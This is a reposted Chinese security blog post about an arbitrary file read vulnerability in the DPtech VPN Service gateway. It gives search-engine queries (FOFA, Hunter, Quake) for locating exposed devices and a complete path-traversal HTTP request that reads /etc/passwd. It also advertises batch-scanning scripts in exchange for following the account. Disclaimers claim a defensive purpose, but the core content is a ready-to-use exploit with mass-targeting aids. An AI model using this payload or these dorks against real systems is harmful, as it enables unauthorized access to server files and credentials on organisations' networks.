# 拒绝知识星球付费POC
关注本公众号,长期更新红蓝对抗(工具,漏洞等。。)
免责声明:
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
漏洞描述
DPtech VPN是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问;支持基于用户、应用的安全策略,同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口;除此以外,实现了集中管理、统一配置,并集成AC和PoE功能,支持3G/4G无线模块扩展,可有效的简化用户组网,降低运维成本。
杭州迪普科技股份有限公司DPTech VPN Service 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。
关键字
fofa:app="DPtech-SSLVPN",cert="DPtechCa"
hunter:cert="DPtechCa"
360quanke:cert:"DPtechCa"
漏洞复现
poc: /../../../../../../../etc/passwd
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host:
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
检测poc
单个检测:
批量检测:
脚本获取方式:
关注本公众号,回复“1009”
原文始发于微信公众号(知攻善防实验室):迪普VPN Service 接口存在任意文件读取漏洞[附POC]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论